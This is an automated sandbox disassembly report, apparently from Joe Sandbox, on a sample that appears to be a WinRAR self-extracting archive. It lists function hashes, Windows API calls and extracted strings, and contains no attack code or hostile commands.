                                                                                              • Instruction ID: 643ac6f04bd0c679d714320f94d30e42d84446c8676564e4caf4e4e60ccd40b6
                                                                                              • Opcode Fuzzy Hash: 7bf5dc2af928c1d01f709ffdecfdace228e5cc3b352e1872b280881dcdc89ff2
                                                                                              • Instruction Fuzzy Hash: 81F02830484348ABDF174F61EE0A7FB3B98AF45388F08A285FC44741A1C7B6C544EB60
                                                                                              APIs
                                                                                              • LoadLibraryExW.KERNEL32(00000000,00000000,00000800,?,00E8A843,00000000,?,00EB6150,?,?,?,00E8A9E6,00000004,InitializeCriticalSectionEx,00E9F7F4,InitializeCriticalSectionEx), ref: 00E8A89F
                                                                                              • GetLastError.KERNEL32(?,00E8A843,00000000,?,00EB6150,?,?,?,00E8A9E6,00000004,InitializeCriticalSectionEx,00E9F7F4,InitializeCriticalSectionEx,00000000,?,00E8A79D), ref: 00E8A8A9
                                                                                              • LoadLibraryExW.KERNEL32(00000000,00000000,00000000), ref: 00E8A8D1
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.2310199497.0000000000E61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E60000, based on PE: true
                                                                                              • Associated: 00000000.00000002.2309856294.0000000000E60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2310775751.0000000000E9C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2310833078.0000000000EA9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2310833078.0000000000EB2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2310981603.0000000000EB7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_e60000_FS04dlvJrq.jbxd
                                                                                              Similarity
                                                                                              • API ID: LibraryLoad$ErrorLast
                                                                                              • String ID: api-ms-
                                                                                              • API String ID: 3177248105-2084034818
                                                                                              • Opcode ID: 8ecfa58bb03d68ccc18d56ad0eb016a74035eea7dab0363e893eb8f5074fd9f4
                                                                                              • Instruction ID: 3e29fdba105ef7a418ace27e63e4736b1df22fc62b880c6bbb2894d76ed0e3f1
                                                                                              • Opcode Fuzzy Hash: 8ecfa58bb03d68ccc18d56ad0eb016a74035eea7dab0363e893eb8f5074fd9f4
                                                                                              • Instruction Fuzzy Hash: 6BE04870280705BBEF113BA1DC0AB183B959B10B55F241033F90DF44E0D761985597A5
                                                                                              APIs
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.2310199497.0000000000E61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E60000, based on PE: true
                                                                                              • Associated: 00000000.00000002.2309856294.0000000000E60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2310775751.0000000000E9C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2310833078.0000000000EA9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2310833078.0000000000EB2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2310981603.0000000000EB7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_e60000_FS04dlvJrq.jbxd
                                                                                              Similarity
                                                                                              • API ID: __alldvrm$_strrchr
                                                                                              • String ID:
                                                                                              • API String ID: 1036877536-0
                                                                                              • Opcode ID: 1ec6666d94b4212580304211626675eb5ed9854efa503107affec4ce99a0ac8c
                                                                                              • Instruction ID: 7397386da6cbde1704eace4ea093e53dc454befd0955a6f3758eb834304b9759
                                                                                              • Opcode Fuzzy Hash: 1ec6666d94b4212580304211626675eb5ed9854efa503107affec4ce99a0ac8c
                                                                                              • Instruction Fuzzy Hash: E6A17B72E003869FEF25CF28C8917AEBBE5EF91314F58516DE594BB282C6748D81C790
                                                                                              APIs
                                                                                              • MultiByteToWideChar.KERNEL32(?,00000000,?,?,00000000,00000000,00E90481,?,00000000,?,00000001,?,?,00000001,00E90481,?), ref: 00E93685
                                                                                              • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 00E9370E
                                                                                              • GetStringTypeW.KERNEL32(?,00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,00E8DBD1,?), ref: 00E93720
                                                                                              • __freea.LIBCMT ref: 00E93729
                                                                                                • Part of subcall function 00E9040E: RtlAllocateHeap.NTDLL(00000000,00E8535E,?,?,00E86C16,?,?,?,?,?,00E85269,00E8535E,?,?,?,?), ref: 00E90440
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.2310199497.0000000000E61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E60000, based on PE: true
                                                                                              • Associated: 00000000.00000002.2309856294.0000000000E60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2310775751.0000000000E9C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2310833078.0000000000EA9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2310833078.0000000000EB2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2310981603.0000000000EB7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_e60000_FS04dlvJrq.jbxd
                                                                                              Similarity
                                                                                              • API ID: ByteCharMultiWide$AllocateHeapStringType__freea
                                                                                              • String ID:
                                                                                              • API String ID: 2652629310-0
                                                                                              • Opcode ID: e7662327a923ac0f483861591edd692fb3b63816de7f76c59b238936e3d903c4
                                                                                              • Instruction ID: f778d9b33f2bdb028d29b3398e50d713c8cbe34cdab86581feca5c92843f0abb
                                                                                              • Opcode Fuzzy Hash: e7662327a923ac0f483861591edd692fb3b63816de7f76c59b238936e3d903c4
                                                                                              • Instruction Fuzzy Hash: 3A31BDB2A0020AABDF249F75DC85DAF7BE5EB00754F14012AFC08E6251EB35CE54CBA0
                                                                                              APIs
                                                                                              • __EH_prolog3.LIBCMT ref: 00E762D4
                                                                                              • ExpandEnvironmentStringsW.KERNEL32(?,00000000,00000000,?,?,?,?,?,00000010), ref: 00E762EB
                                                                                              • ExpandEnvironmentStringsW.KERNEL32(?,?,?,00000000,?,?,?,?,?,00000010), ref: 00E76328
                                                                                              • _wcslen.LIBCMT ref: 00E76338
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.2310199497.0000000000E61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E60000, based on PE: true
                                                                                              • Associated: 00000000.00000002.2309856294.0000000000E60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2310775751.0000000000E9C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2310833078.0000000000EA9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2310833078.0000000000EB2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2310981603.0000000000EB7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_e60000_FS04dlvJrq.jbxd
                                                                                              Similarity
                                                                                              • API ID: EnvironmentExpandStrings$H_prolog3_wcslen
                                                                                              • String ID:
                                                                                              • API String ID: 3741103063-0
                                                                                              • Opcode ID: 54f2a91b55c97859ba0bb0f3d0eafada0a631667f0a8667362d9920064847010
                                                                                              • Instruction ID: 21d7fa48cc53ad6d6952f0e9ac8f015ebefb4a3db8f142cae21743c913ec6ca9
                                                                                              • Opcode Fuzzy Hash: 54f2a91b55c97859ba0bb0f3d0eafada0a631667f0a8667362d9920064847010
                                                                                              • Instruction Fuzzy Hash: 6311E370A0060ABFDB00AFA4DD858BFBBB9FF40348B14A11EB419B7240DB309D00CBA0
                                                                                              APIs
                                                                                              • __EH_prolog3.LIBCMT ref: 00E71273
                                                                                                • Part of subcall function 00E7067E: GetVersionExW.KERNEL32(?), ref: 00E706AF
                                                                                              • FoldStringW.KERNEL32(00000020,?,000000FF,00000000,00000000,0000000C,00E6350C,522FB72A,00000000,?,?,00E643F5,?,?,?,00000000), ref: 00E7129A
                                                                                              • FoldStringW.KERNEL32(00000020,?,000000FF,?,?,00000000), ref: 00E712D4
                                                                                              • _wcslen.LIBCMT ref: 00E712DF
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.2310199497.0000000000E61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E60000, based on PE: true
                                                                                              • Associated: 00000000.00000002.2309856294.0000000000E60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2310775751.0000000000E9C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2310833078.0000000000EA9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2310833078.0000000000EB2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2310981603.0000000000EB7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_e60000_FS04dlvJrq.jbxd
                                                                                              Similarity
                                                                                              • API ID: FoldString$H_prolog3Version_wcslen
                                                                                              • String ID:
                                                                                              • API String ID: 535866816-0
                                                                                              • Opcode ID: 3bc585082870edb55b978ecafe13360da0cdae9a4e2f30f700fcf7ac43074e42
                                                                                              • Instruction ID: d91b17496625474f26ce3b1bef2fbf8e69972494b109b1dfc6a0503ff92f8216
                                                                                              • Opcode Fuzzy Hash: 3bc585082870edb55b978ecafe13360da0cdae9a4e2f30f700fcf7ac43074e42
                                                                                              • Instruction Fuzzy Hash: 8411C171A01225ABDB00ABADDD099AF7BA9EF04720F24524AB814F7291DB60990087F1
                                                                                              APIs
                                                                                              • LoadLibraryExW.KERNEL32(00000000,00000000,00000800,00000000,00000000,00000000,?,00E9198B,00000000,00000000,00000000,00000000,?,00E91B88,00000006,FlsSetValue), ref: 00E91A16
                                                                                              • GetLastError.KERNEL32(?,00E9198B,00000000,00000000,00000000,00000000,?,00E91B88,00000006,FlsSetValue,00EA0DD0,FlsSetValue,00000000,00000364,?,00E900D7), ref: 00E91A22
                                                                                              • LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,00E9198B,00000000,00000000,00000000,00000000,?,00E91B88,00000006,FlsSetValue,00EA0DD0,FlsSetValue,00000000), ref: 00E91A30
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.2310199497.0000000000E61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E60000, based on PE: true
                                                                                              • Associated: 00000000.00000002.2309856294.0000000000E60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2310775751.0000000000E9C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2310833078.0000000000EA9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2310833078.0000000000EB2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2310981603.0000000000EB7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_e60000_FS04dlvJrq.jbxd
                                                                                              Similarity
                                                                                              • API ID: LibraryLoad$ErrorLast
                                                                                              • String ID:
                                                                                              • API String ID: 3177248105-0
                                                                                              • Opcode ID: 2e1eb3698506a21ac394559ac06a8f75a459a9eaa3efb603c43f0d53aef07a36
                                                                                              • Instruction ID: b324e10cb9a06388d4c85c62b37e41ba63f459c43ed4b3ec169cfcb4492d283d
                                                                                              • Opcode Fuzzy Hash: 2e1eb3698506a21ac394559ac06a8f75a459a9eaa3efb603c43f0d53aef07a36
                                                                                              • Instruction Fuzzy Hash: 0701F7326462239FCB219BAA9C44A5A7798AF057A5B211665F90AF3280C770DC05C6F0
                                                                                              APIs
                                                                                              • __EH_prolog3.LIBCMT ref: 00E71310
                                                                                              • GetCurrentDirectoryW.KERNEL32(00000000,00000000,0000000C,00E717FB,?,?,\\?\,522FB702,?,?,?,00000000,00E9A279,000000FF), ref: 00E71319
                                                                                              • GetCurrentDirectoryW.KERNEL32(?,?,00000000,?,?,?,00000000,00E9A279,000000FF), ref: 00E71348
                                                                                              • _wcslen.LIBCMT ref: 00E71351
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.2310199497.0000000000E61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E60000, based on PE: true
                                                                                              • Associated: 00000000.00000002.2309856294.0000000000E60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2310775751.0000000000E9C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2310833078.0000000000EA9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2310833078.0000000000EB2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2310981603.0000000000EB7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_e60000_FS04dlvJrq.jbxd
                                                                                              Similarity
                                                                                              • API ID: CurrentDirectory$H_prolog3_wcslen
                                                                                              • String ID:
                                                                                              • API String ID: 19219720-0
                                                                                              • Opcode ID: 2c7d1f7a249c27392093b812a74be602198180a9efa54dbcae1f979567528fdc
                                                                                              • Instruction ID: f3fcefb57b17b352358596677ff4bc9669a1054c646e65256abe061bbb72dbeb
                                                                                              • Opcode Fuzzy Hash: 2c7d1f7a249c27392093b812a74be602198180a9efa54dbcae1f979567528fdc
                                                                                              • Instruction Fuzzy Hash: 4B01F272900215BB8B01AFF999058FFBBB9AF81760B15624AB508F7240CF34490087E0
                                                                                              APIs
                                                                                              • GetDC.USER32(00000000), ref: 00E7EB77
                                                                                              • GetDeviceCaps.GDI32(00000000,00000058), ref: 00E7EB86
                                                                                              • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00E7EB94
                                                                                              • ReleaseDC.USER32(00000000,00000000), ref: 00E7EBA2
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.2310199497.0000000000E61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E60000, based on PE: true
                                                                                              • Associated: 00000000.00000002.2309856294.0000000000E60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2310775751.0000000000E9C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2310833078.0000000000EA9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2310833078.0000000000EB2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2310981603.0000000000EB7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_e60000_FS04dlvJrq.jbxd
                                                                                              Similarity
                                                                                              • API ID: CapsDevice$Release
                                                                                              • String ID:
                                                                                              • API String ID: 1035833867-0
                                                                                              • Opcode ID: f86e2b5c1e719cb53b97ca4ccb642fe6d94e0b72f1528029ac594cce750c2bde
                                                                                              • Instruction ID: 9a6685215c6faf0a169eb6fc2979a22b9fc4421c448251a44177b1a55fce17ea
                                                                                              • Opcode Fuzzy Hash: f86e2b5c1e719cb53b97ca4ccb642fe6d94e0b72f1528029ac594cce750c2bde
                                                                                              • Instruction Fuzzy Hash: 2CE0123294AF21AFD7612B76BD0DB873E94EF59B53F000741F745BA6D4C6B144088BA0
APIs
• __Init_thread_footer.LIBCMT ref: 00E78294
  • Part of subcall function 00E614A7: _wcslen.LIBCMT ref: 00E614B8
  • Part of subcall function 00E8087E: __EH_prolog3_GS.LIBCMT ref: 00E80885
  • Part of subcall function 00E8087E: GetLastError.KERNEL32(0000001C,00E78244,?,00000000,00000086,?,522FB702,?,?,?,?,?,00000000,00E9A75D,000000FF), ref: 00E8089D
  • Part of subcall function 00E8087E: SetLastError.KERNEL32(00000000,?,?,?,?,?,?,?,00000000,00E9A75D,000000FF), ref: 00E808D6
Strings
Memory Dump Source
• Source File: 00000000.00000002.2310199497.0000000000E61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E60000, based on PE: true
• Associated: 00000000.00000002.2309856294.0000000000E60000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2310775751.0000000000E9C000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2310833078.0000000000EA9000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2310833078.0000000000EB2000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2310981603.0000000000EB7000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_e60000_FS04dlvJrq.jbxd
Similarity
• API ID: ErrorLast$H_prolog3_Init_thread_footer_wcslen
• String ID: %ls
• API String ID: 1279724102-3246610740
• Opcode ID: de188339548049471228a0fc8652b60085a11315b056d1e9d11ff5ef55f27f2e
• Instruction ID: 9f243a17006fed89a72c239a3d70c4ac5fa53931b4d52f3ea6c6312a4f1ded6e
• Opcode Fuzzy Hash: de188339548049471228a0fc8652b60085a11315b056d1e9d11ff5ef55f27f2e
• Instruction Fuzzy Hash: A5B1DE70884209EADB31EF90CA4AFEE7BF0AF25344F10A459F55A331E6DF715A15DA80
APIs
  • Part of subcall function 00E9246B: GetOEMCP.KERNEL32(00000000,?,?,00E926F4,?), ref: 00E92496
• IsValidCodePage.KERNEL32(-00000030,00000000,?,?,?,?,00E92739,?,00000000), ref: 00E92914
• GetCPInfo.KERNEL32(00000000,9',?,?,?,00E92739,?,00000000), ref: 00E92927
Strings
Similarity
• API ID: CodeInfoPageValid
• String ID: 9'
• API String ID: 546120528-600133814
• Opcode ID: de7cf840332e66df606455170b50d08196945dd695492da7e1a52a0ee31fca79
• Instruction ID: 08e62441d7f5d6e3dc3144e614bd62e33484799cc431aa49c48f458278f12e7c
• Opcode Fuzzy Hash: de7cf840332e66df606455170b50d08196945dd695492da7e1a52a0ee31fca79
• Instruction Fuzzy Hash: 0F513371A00342BFDF21DF35C8806FBBBE5EF81304F14606ED29AAB252D6759945CB90
APIs
• _free.LIBCMT ref: 00E91FD4
  • Part of subcall function 00E8ACBB: IsProcessorFeaturePresent.KERNEL32(00000017,00E8AC8D,00E8535E,?,?,00000000,00E8535E,00000016,?,?,00E8AC9A,00000000,00000000,00000000,00000000,00000000), ref: 00E8ACBD
  • Part of subcall function 00E8ACBB: GetCurrentProcess.KERNEL32(C0000417,?,00E8535E), ref: 00E8ACDF
  • Part of subcall function 00E8ACBB: TerminateProcess.KERNEL32(00000000,?,00E8535E), ref: 00E8ACE6
Strings
Similarity
• API ID: Process$CurrentFeaturePresentProcessorTerminate_free
• String ID: *?$.
• API String ID: 2667617558-3972193922
• Opcode ID: ddd9ab5e61b6f17a30a233bd59a6b62b4ed979bfdbd97246aefffea125efcfc1
• Instruction ID: ad873d542af5535a0fd7b0c92d37b243984271836c6e308f6168dadccfb2fec7
• Opcode Fuzzy Hash: ddd9ab5e61b6f17a30a233bd59a6b62b4ed979bfdbd97246aefffea125efcfc1
• Instruction Fuzzy Hash: BF517D75E0020AAFDF14DFA8C881AADBBF5EF58314F2451AAE854F7341E7759A018B50
APIs
• GetCPInfo.KERNEL32(?,?,00000005,?,00000000), ref: 00E92568
Strings
Similarity
• API ID: Info
• String ID: $}*
• API String ID: 1807457897-1947344957
• Opcode ID: c6d94640f01079c0d36657b0d44beeaf0bd980cfab8048aa60d8051aba5e0898
• Instruction ID: 4a05f773845474bf799f2a55bcbd141c299f51981ce0d988a1e446c5da27b07e
• Opcode Fuzzy Hash: c6d94640f01079c0d36657b0d44beeaf0bd980cfab8048aa60d8051aba5e0898
• Instruction Fuzzy Hash: 36412C70504248BFDF228E24CC84BF6BBF9EB45308F1414EDE68AA7143D235AA45DF61
APIs
  • Part of subcall function 00E779F7: GetSystemTime.KERNEL32(?,00000000), ref: 00E77A0F
  • Part of subcall function 00E779F7: SystemTimeToFileTime.KERNEL32(?,?), ref: 00E77A1D
  • Part of subcall function 00E779A0: __aulldiv.LIBCMT ref: 00E779A9
• __aulldiv.LIBCMT ref: 00E6F162
• GetCurrentProcessId.KERNEL32(00000000,?,000186A0,00000000,522FB702,?,?,00000000,?,00000000,00E99F3D,000000FF), ref: 00E6F169
  • Part of subcall function 00E61150: _wcslen.LIBCMT ref: 00E6115B
Strings
Similarity
• API ID: Time$System__aulldiv$CurrentFileProcess_wcslen
• String ID: .rartemp
• API String ID: 3789791499-2558811017
• Opcode ID: 65e8f4405c9036efe11628a8ed55326b385e9492f941290212955f6cd27e9193
• Instruction ID: 41c2688f348f0a4d143a861499500212957829758e9e4be0bba6ed91871ef3a1
• Opcode Fuzzy Hash: 65e8f4405c9036efe11628a8ed55326b385e9492f941290212955f6cd27e9193
• Instruction Fuzzy Hash: BB418271940248ABDB15EFB4DC45EEE77E8EF44390F445169F519B3282EB349B04CA60
APIs
• __EH_prolog3.LIBCMT ref: 00E7DAD5
  • Part of subcall function 00E70360: __EH_prolog3.LIBCMT ref: 00E70367
Strings
Similarity
• API ID: H_prolog3
• String ID: Shell.Explorer$about:blank
• API String ID: 431132790-874089819
• Opcode ID: 055b3194dfe2290d0cc5bce69b4b602c08210ab21e8a3804bf3aa9aa37a7e3c1
• Instruction ID: d5831eab9b37844b9f25146f3343e8ecf85345f36554d4a94c3be493da22d669
• Opcode Fuzzy Hash: 055b3194dfe2290d0cc5bce69b4b602c08210ab21e8a3804bf3aa9aa37a7e3c1
• Instruction Fuzzy Hash: 9C414C706046019FDB18EFA4CC55B6A77B5AF88704F15D0AEE90ABF2A1DB71AD00CB50
APIs
• __EH_prolog3_GS.LIBCMT ref: 00E7D7F2
• ShowWindow.USER32(?,00000005), ref: 00E7D8E8
Strings
Similarity
• API ID: H_prolog3_ShowWindow
• String ID: qI
• API String ID: 4203566401-2428486414
• Opcode ID: b07d146d358698b5f5d21e7127f56af8cfedbe6839a6fd99d40a2cd55d68c885
• Instruction ID: 592eac6332cd04ed09db2d8032f6f8a544b88580bf268ea83086bd44cb726404
• Opcode Fuzzy Hash: b07d146d358698b5f5d21e7127f56af8cfedbe6839a6fd99d40a2cd55d68c885
• Instruction Fuzzy Hash: ED415C31A10629AFDB05EFA9DC88A9DBBB5BF4C314B049059F609B7260DB71AC05CF90
APIs
Strings
Similarity
• API ID: H_prolog3_
• String ID: Software\WinRAR SFX$jL
• API String ID: 2427045233-923024267
• Opcode ID: 09ffe2ff2d00044c70c7e1f3aa029aeaca64123978482f80b5329357faf73fb6
• Instruction ID: db37d83327c4be846c296f08b4a718a0f16557f3c650da3a182bd6f428b39dc3
• Opcode Fuzzy Hash: 09ffe2ff2d00044c70c7e1f3aa029aeaca64123978482f80b5329357faf73fb6
• Instruction Fuzzy Hash: A9214B71900208EFDB21EFA5DD89EEEBBB9FB88B00F10551AF509B2250D7719A44CB60
APIs
  • Part of subcall function 00E61E44: GetDlgItem.USER32(00000000,00003021), ref: 00E61E88
  • Part of subcall function 00E61E44: SetWindowTextW.USER32(00000000,00E9C6C8), ref: 00E61E9E
• EndDialog.USER32(?,00000001), ref: 00E8017B
• SetDlgItemTextW.USER32(?,00000067,?), ref: 00E801B9
Strings
Similarity
• API ID: ItemText$DialogWindow
• String ID: GETPASSWORD1
• API String ID: 445417207-3292211884
• Opcode ID: 79154dc63e7956a78349a4bae8212f9ca036a4317cb83ef5322da935d17aedb5
• Instruction ID: 5b945cc07c34bc61448fdfc3f6db179e0a60a1204654155fd42626678675e662
• Opcode Fuzzy Hash: 79154dc63e7956a78349a4bae8212f9ca036a4317cb83ef5322da935d17aedb5
• Instruction Fuzzy Hash: 9611E6B26463147BE2B1AA249C49FFB77ECEB89714F401429F74DB3180C771A8498775
APIs
  • Part of subcall function 00E75094: GetProcAddress.KERNEL32(00000000,CryptProtectMemory), ref: 00E750B3
  • Part of subcall function 00E75094: GetProcAddress.KERNEL32(00EB51F8,CryptUnprotectMemory), ref: 00E750C3
• GetCurrentProcessId.KERNEL32(?,00000200,?,00E75104), ref: 00E75197
Strings
• CryptUnprotectMemory failed, xrefs: 00E7518F
• CryptProtectMemory failed, xrefs: 00E7514E
                                                                                              Similarity
                                                                                              • API ID: AddressProc$CurrentProcess
                                                                                              • String ID: CryptProtectMemory failed$CryptUnprotectMemory failed
                                                                                              • API String ID: 2190909847-396321323
                                                                                              APIs
                                                                                              • GetCurrentProcess.KERNEL32(00020008,?), ref: 00E7FEB6
                                                                                              • GetLastError.KERNEL32 ref: 00E7FEE1
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.2310199497.0000000000E61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E60000, based on PE: true
                                                                                              • Associated: 00000000.00000002.2309856294.0000000000E60000.00000002.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.2310775751.0000000000E9C000.00000002.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.2310833078.0000000000EA9000.00000004.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.2310833078.0000000000EB2000.00000004.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.2310981603.0000000000EB7000.00000002.00000001.01000000.00000003.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_e60000_FS04dlvJrq.jbxd
                                                                                              Similarity
                                                                                              • API ID: CurrentErrorLastProcess
                                                                                              • String ID: $L
                                                                                              • API String ID: 335030130-1469215623
                                                                                              APIs
                                                                                              • IsWindowVisible.USER32(0001043E), ref: 00E84291
                                                                                              • DialogBoxParamW.USER32(GETPASSWORD1,0001043E,00E80110,?), ref: 00E842BA
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.2310199497.0000000000E61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E60000, based on PE: true
                                                                                              • Associated: 00000000.00000002.2309856294.0000000000E60000.00000002.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.2310775751.0000000000E9C000.00000002.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.2310833078.0000000000EA9000.00000004.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.2310833078.0000000000EB2000.00000004.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.2310981603.0000000000EB7000.00000002.00000001.01000000.00000003.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_e60000_FS04dlvJrq.jbxd
                                                                                              Similarity
                                                                                              • API ID: DialogParamVisibleWindow
                                                                                              • String ID: GETPASSWORD1
                                                                                              • API String ID: 3157717868-3292211884
                                                                                              APIs
                                                                                              • WaitForSingleObject.KERNEL32(?,000000FF,00E7770A,?,?,00E7777F,?,?,?,?,?,00E77769), ref: 00E775F3
                                                                                              • GetLastError.KERNEL32(?,?,00E7777F,?,?,?,?,?,00E77769), ref: 00E775FF
                                                                                                • Part of subcall function 00E692EB: __EH_prolog3_GS.LIBCMT ref: 00E692F2
                                                                                              Strings
                                                                                              • WaitForMultipleObjects error %d, GetLastError %d, xrefs: 00E77608
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.2310199497.0000000000E61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E60000, based on PE: true
                                                                                              • Associated: 00000000.00000002.2309856294.0000000000E60000.00000002.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.2310775751.0000000000E9C000.00000002.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.2310833078.0000000000EA9000.00000004.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.2310833078.0000000000EB2000.00000004.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.2310981603.0000000000EB7000.00000002.00000001.01000000.00000003.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_e60000_FS04dlvJrq.jbxd
                                                                                              Similarity
                                                                                              • API ID: ErrorH_prolog3_LastObjectSingleWait
                                                                                              • String ID: WaitForMultipleObjects error %d, GetLastError %d
                                                                                              • API String ID: 2419225763-2248577382
                                                                                              APIs
                                                                                              • GetModuleHandleW.KERNEL32(00000000,?,00000000,?,00000000,00200000,?,?,00000000,0000005C,522FB702), ref: 00E73E65
                                                                                              • FindResourceW.KERNEL32(00000000,RTL,00000005), ref: 00E73E73
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.2310199497.0000000000E61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E60000, based on PE: true
                                                                                              • Associated: 00000000.00000002.2309856294.0000000000E60000.00000002.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.2310775751.0000000000E9C000.00000002.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.2310833078.0000000000EA9000.00000004.00000001.01000000.00000003.sdmp
